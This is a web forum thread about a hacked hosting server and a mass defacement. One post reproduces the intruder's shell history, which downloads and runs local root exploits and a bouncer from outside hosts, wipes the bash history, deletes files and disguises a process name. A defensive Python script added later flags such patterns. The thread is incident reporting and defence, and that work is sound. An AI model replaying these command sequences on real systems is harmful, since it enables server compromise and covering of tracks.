NukeCops  
Security: Hacker on the Loose
Securitycazz writes "I just wanted you to know ASAP that Mtechnik.net and all other sites on that server closely related and belonging to Mikey have been infiltrated by a hacker.

I posted news on this at: Mythic

Until Mikey gets back from wherever he got to - I do not have further info. It appears to have been a root kit perhaps.


View What The Hacker Did




-CAZZ
Admin / mtechnik.net



Admin Note: For myself, I cannot even bring up his site -- not even thru Google cache."
Posted on Wednesday, December 10 @ 11:10:18 CET by Zhen-Xjell
 

Re: Hacker on the Loose (Score: 1)
by Daniel-cmw on Wednesday, December 10 @ 11:13:10 CET
Just because the page is only half loaded doesn't really mean it's been hacked.
It could be anything, server error, theme problems, addon corrupt.. anything..

Unless you can come up with the logs to show what the 'hacker' did.



Re: Hacker on the Loose (Score: 1)
by VIPixel on Wednesday, December 10 @ 13:28:56 CET
Me and Mikey have no idea yet what port they used to inject this trojan, but they attacked while Mikey was setting up the server for security, just moving to a new server for a few hours!! Shame, hacker!

The attack method is mass defacement by injecting a trojan, replacing some binaries and creating root access:

uid 0 account (techteam) - BAD!

Just like the w00t exploit, but I'm not sure; I have had no chance to dig deep into the logs.

When this kid was attacking, the server lagged very badly.
Guess what? They search all index.* on the hard drive and echo with their index.* content,

which means every index.* on / has been replaced,
including the cPanel themes.

Mikey is not shutting down the server, but the tech guy does, to restore the server. We can't do anything but damn wait till it's fixed!
Hope y'all understand this situation.

To find out what mass defacement is:
http://www.zone-h.org

screenshot:
http://205.214.71.150/hacked.jpg

Brumie and Mikey



Re: Hacker on the Loose (Score: 1)
by kwality on Wednesday, December 10 @ 15:43:00 CET
I've been looking around for some info on this "kernel panic" trojan and came up with this. There is also a fix if this is indeed the problem.

http://www.securiteam.com/unixfocus/6R0001F8VG.html

Hope this helps cazz.

-Ollie-



Re: Hacker on the Loose (Score: 1)
by VinDSL on Thursday, December 11 @ 03:17:42 CET
http://www.lenon.com/
It's the Brazilians again! Got my site tonight too... :(



Re: Hacker on the Loose (Score: 1)
by Mtechnik on Thursday, December 11 @ 03:23:51 CET
http://www.mtechnik.net
Well, first, thanks for the support, guys. To clarify some things: my server was hacked, yes. The hacker got access by ssh telnet; here is one log:
ls
./pt
./kmod
./own
./klogd
./kmod
rm kmod
rm -rf kmod
wget www.viperhaxu.hpg.com.br/ptrace
chmod ptrace
chmod 777 ptrace
./ptrace
wget www.skater0x.hpg.com.br/local/kmod
chmod 777 kmod.1
./kmod.1
./newlocal
gcc fedor.c -o fedor
ls
./f
uname -a
chmod 777 f
./f
id
pwd
wget www.skater0x.hpg.com.br/xpll/cancer
echo SU3D OWNZ > index.txt
chmod 777 cancer
./cancer index.txt
ls
rm bind.txt
ls -la
cat .bash_history
ls
./kmod
./cbd
./cbd 10.28.88.142
cat fedor.c
./f
./ptrace
c
./pt
z
ls
ls
./setuid
id
./ptrace
./own
./ptrace
wget www.creatividade.hpg.com.br/locals
chmod 777 locals
./locals
./locals
./locals
rm -rf locals
ls
./ptrace
echo lol >.bash_history
ls
./td
id
./pt
id
./td
ls
w
id
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
wget thecoreteam.home.ro/pt
chmod +x pt
./pt
./pt
./pt
./pt
./pt
wget www.geocities.com/sorin_smen/psybnc.tgz
ls
rm -rf *
cd ..
ls
rm -rf *
ls
./newlocal
./localroot
./own
./kmod
rm -rf *
chmod +wrx setuid
id
ls -all
ls
rm -rf sess_fc187590539417321dd72b37686e7e27
cd www.geocities.com/sorin_smen/psybnc.tgz
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c82
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
wget www.geocities.com/sorin_smen/psybnc.tgz
tar zxvf psybnc.tgz
cd psybnc
./psybnc
kill -9 32751
rm -rf psybnc.conf
wget thecoreteam.home.ro/psybnc.conf
mv psybnc "squid -D"
./"squid -D"
exit
id
./km
ls
ls -al km
./km
./km
./km;./km;./km
exit

That's just one; there are plenty more. As for the server not loading, well, I decided to shut the whole server down; that hacker pic was just too annoying.
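
A defender's triage of a shell history like the one posted above, as an added example that is not part of the original thread: it flags download-chmod-execute chains (allowing for the `.1` suffix wget adds when the file name is already taken, as with `kmod.1` in the log), overwrites of `.bash_history`, and renames to a name containing a space. The rule names, the `triage` function and the placeholder host are assumptions made for this illustration.

```python
import re
import shlex

# Writes to or removal of the history file, or HISTFILE reassignment.
HIST_TAMPER = re.compile(r"(>+|\brm\b.*)\s*\S*\.bash_history|\bHISTFILE=")

# Constructed sample: commands shaped like the posted log, placeholder host.
SAMPLE_HISTORY = """\
uname -a
wget files.example.invalid/local/kmod
chmod 777 kmod.1
./kmod.1
id
cat .bash_history
echo lol >.bash_history
mv psybnc "squid -D"
./"squid -D"
"""

def _name(path):
    """Basename without the .N suffix wget adds when the file already exists."""
    return re.sub(r"\.\d+$", "", path.rstrip("/").rsplit("/", 1)[-1])

def triage(history):
    """Return (line_no, rule, command) tuples for suspicious history lines."""
    findings, fetched, armed = [], set(), set()
    for no, raw in enumerate(history.splitlines(), 1):
        try:
            argv = shlex.split(raw)
        except ValueError:            # unbalanced quotes: split on whitespace
            argv = raw.split()
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if HIST_TAMPER.search(raw):
            findings.append((no, "history-tamper", raw))
        elif cmd in ("wget", "curl"):  # remember what was downloaded
            fetched.update(_name(a) for a in args if not a.startswith("-"))
        elif cmd == "chmod":           # downloaded file gets a mode change
            armed.update(_name(a) for a in args[1:] if _name(a) in fetched)
        elif cmd == "mv" and len(args) == 2 and " " in args[1]:
            findings.append((no, "masquerade-rename", raw))
        elif cmd.startswith("./") and _name(cmd) in armed:
            findings.append((no, "download-chmod-exec", raw))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_HISTORY):
        print(finding)
```

Reading the history file (`cat .bash_history`) is deliberately not flagged; only writes to it, removal of it, or a `HISTFILE=` assignment are.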



Re: Hacker on the Loose (Score: 1)
by VinDSL on Thursday, December 11 @ 04:46:34 CET
http://www.lenon.com/
Hey, Mtechnik, did your site receive the following defacement?
"yeah! i am from brasil! r0x a lot

“Every night I “connect” in order to vent as much as I can, until I tire out so that sleep can then come and take me to bed. I try to imagine the future every single day, and the only future I wish to see is the solution to the pain that consumes me, in no hurry to end. Loneliness really took a liking to me. It liked me so much that it decided to visit me every night. And always very rude, for it arrives without warning, and in no hurry to end its psychological pressures.

But loneliness did not count on meeting a guy as crazy as itself. For I am a hacker, and the network brought me happiness. The happiness of knowing that loneliness would not make me cry from heartache and fall into its temptations and miseries. The network, with its fantasies and mysteries, once I am connected, excites me, makes me feel desire, makes me strong and hot, makes me cry and laugh, makes me want to run, want to scream, to love, want to live and forget everything. It is a strength we could hardly find alone, it is a friend for every problem, it is a window to a warm, slow and mysterious world. Everyone has their reason; I have mine, and you surely must have yours. Many think this is madness. Madness is my life..........HACKER!”"

Blah, blah and blah...


Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)